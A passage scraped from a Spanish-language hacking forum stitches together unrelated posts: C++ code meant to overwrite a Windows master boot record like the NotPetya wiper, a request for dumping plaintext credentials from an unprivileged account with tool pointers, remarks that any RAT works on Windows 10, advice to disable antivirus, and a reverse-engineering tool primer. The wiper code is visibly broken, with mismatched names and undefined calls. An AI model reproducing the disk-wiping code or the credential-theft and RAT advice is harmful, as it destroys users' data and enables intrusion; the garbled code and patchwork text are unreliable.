Buenas underc0deanos,

Supongo que todo el mundo ha visto las noticias de NotPetya, y si alguno ha leído los análisis técnicos sabrá que era un wiper y no un ransomware, debido a que reescribe el sector de arranque del disco duro dejando el pc inservible una vez se haya reiniciado/apagado.

A continuación dejo un código que tenia guardado sobre como hacer esto.

Espero que sea útil para poder estudiarlo.

/*
  Rewrite boot master record code sample
  Credits to 0memory
*/
#include <windows.h>
#include <iostream>

using namespace std;

#define MBR_SIZE 512
int main(int argc, char const *argv[]) {
  DWORD write;
  char mbrdata[MBR_SIZE];
  Underc0de(&mbrData, (sizeof mbrdata));

  HANDLE MasterBootRecord = CreateFile("\\\\.\\PhysicalDrive0", GENERIC_ALL, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, NULL, NULL)
  if (WriteFile(MasterBootRecord, mbrData, MBR_SIZE, &write, NULL) == TRUE){
    cout << "MBR overwritten" << endl;
    Sleep(5000);
    Exitprocess(0);
  } else {
    cout << "MBR not overwritten" << endl;
    Sleep(5000);
    Exitprocess(0);
  }
  CloseHandle(MasterBootRecord);
  return 0;
}

Un saludo

No se si reir o llorar con ese analisis. No se cansan de hacer el ridiculo en eleven paths?

PD: el titulo esta mal @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Puedes usar shellter

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Como puedo elaborar o escribir la secuencia de código para ejecutar el Volcado de las contraseñas desde un usuario Estándar o Invitado (Sin Ningún Privilegio), con el objetivo de obtener las contraseñas o credenciales en texto plano...


¿Es posible obtener nombre de Usuario y contraseña en el mismo ataque?...


Gracias por su colaboracoón, saludos.

Puedes hacerlo con You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

que cutre xD

Luego hago una POC de como descifrarlo, que creo que se como se hace

En este caso el problema es de virtual box, puede probar a reinstalar o intenta a ver con vmware si no te la detecta. Es raro

Siento decirte que la herramienta que desarrollo eleven paths es una estafa con todas las letras, un intento lamentable de quedar bien despues de ser humillados.

No hay forma de recuperar los archivos, la tool que te ha puesto @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login podria servirte si no has reiniciado el sistema

Yo uso gyazo, este es el repo You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Si la notebook tiene internet en la virtual tendras internet, ajusta el modo de conexion en NAT, en caso de que no te funcione, usa adaptador puente.

Cualquier rat sirve, hasta el bifrost funciona en windows 10. Otra cosa es que algunas versiones puntuales no lo hagan.

Buenas, echa un vistazo a las normas You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Te recomiendo tambien que incluyas tu codigo entre las etiquetas correspondientes para facilitar la lectura

Un saludo

Podrias usar dexprotector You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Esta es la estructura de un zip

      local file header signature     4 bytes  (0x04034b50)
      version needed to extract       2 bytes
      general purpose bit flag        2 bytes
      compression method              2 bytes
      last mod file time              2 bytes
      last mod file date              2 bytes
      crc-32                          4 bytes
      compressed size                 4 bytes
      uncompressed size               4 bytes
      file name length                2 bytes
      extra field length              2 bytes

Ten en cuenta que es little endian

Que es la ingeniería inversa?
Según Wikipedia: La ingeniería inversa es el proceso llevado a cabo con el objetivo de obtener información o un diseño a partir de un producto, con el fin de determinar cuáles son sus componentes y de qué manera interactúan entre sí y cuál fue el proceso de fabricación.
Para qué sirve la ingeniería inversa?
Según Wikipedia:
• Generar diferentes alternativas: del punto de partida del proceso, principalmente código fuente, se generan representaciones gráficas lo que facilita su comprensión.
• Recuperar y/o actualizar la información perdida (cambios que no se documentaron en su momento): en la evolución del sistema se realizan cambios que no se suele actualizar en las representaciones de nivel de abstracción más alto, para lo cual se utiliza la recuperación de diseño.
• Detectar efectos laterales: los cambios que se puedan realizar en un sistema puede conducirnos a que surjan efectos no deseados, esta serie de anomalías puede ser detectados por la ingeniería inversa.
• Facilitar la reutilización: por medio de la ingeniería inversa se pueden detectar componentes de posible reutilización de sistemas existentes, pudiendo aumentar la productividad, reducir los costes y los riesgos de mantenimiento.
En resumen: la ingeniería inversa nos permite entender como se comunica un binario con el PC, una vez entendemos que hace el programa y como lo hace, las posibilidades son infinitas.

Una vez entendido que es la ingeniería inversa... ¿Qué se necesita para realizar ingeniería inversa a un binario?
Lo principal es entender como funciona un ordenador a bajo nivel, como maneja los registros la arquitectura sobre la que corre nuestra aplicación, la pila, etc.. Por tanto, al trabajar a bajo nivel, es necesario saber programar a bajo nivel, o al menos tener la capacidad de leer lenguaje ensamblador. En algunos casos como en aplicaciones desarrolladas en You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, c#, java y algunas mas es posible decompilar el binario y obtener el código en un lenguaje de alto nivel.

A continuación dejo unas cheatsheets con las instrucciones en ensamblador para arquitecturas Intel, ARM y MIPS.

ASM:

MIPS:

ARM:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Una vez tenemos claro el funcionamiento del pc y el funcionamiento de las diferentes instrucciones en bajo nivel. ¿Qué es lo siguiente?
El siguiente paso lógico es detectar en que lenguaje esta desarrollado el software, para esto podemos usar tolos como 4n4l detector, rdgmax packer detector, PEid...
Estas herramientas nos darán parte de la información que necesitamos.
En caso de que nos detecte que la aplicación esta desarrollada en lenguajes que sea posible decompilar, el proceso se facilita mucho.
Algunas herramientas útiles son de4dot, dnspy, ildasm, ilspy.


En caso contrario tenemos que tratar de recopilar toda la información que podamos, suponiendo que trabajemos sobre un binario PE (Windows) debemos saber en que lenguaje ha sido desarrollado, si se le han aplicado packers, si tiene medidas de protección frente a debuggers, que librerías y funciones importa, que secciones tiene el binario y como se organizan y por ultimo verificar que la IAT You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login esta correcta, en caso contrario habrá que repararla para el correcto funcionamiento del ejecutable.
Todo lo mencionado en este punto se puede hacer con PEid, aunque personalmente prefiero usar rdgmax packer detector para identificar posibles packers y el lenguaje ya que es capaz de detectar de forma heurística firmas falsas, para el resto me gusta LordPE.

Por ultimo, queda hacer la parte mas interesante, el análisis dinamico o depurado. Esta fase consiste en ejecutar y experimentar con el binario, someterlo a estrés, modificar el flujo, en definitiva, hacer lo que desde un primer momento queríamos hacer, ya fuese cracking, exploiting, analizar malware o simplemente entender el funcionamiento para replicarlo o mejorarlo.
En esta sección destaca una aplicación por encima de todas las demás IDA de hexrays y no solo por su precio (en torno a 1500$), IDA nos permite realizar análisis estatico y dinamico para cualquier arquitectura sin necesidad de trabajar sobre la arquitectura objetivo, es el programa mas completo con diferencia.
Otras aplicaciones de debugging buenas para windows son ollydbg y windbg.
Para sistemas UNIX sin duda recomiendo radare2, no es fácil de usar pero tiene un potencial tremendo. Para empezar quizás sea mas apropiado usar gdb (gnu debugger) con el modulo peda.

Infografia en el blog: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

puedes usar el rdgmax packer detector You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Te aconsejo expresarte mejor si quieres recibir ayuda.

Un saludo

Puedes usar o Qt o windows forms de visual studio

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Alguna pista  por donde empezar ?

Prueba con ollyDBG

Te lo esta borrando el av, desactivalo.

Aparte ese spynet esta infectado seguro, le sobran 14 mb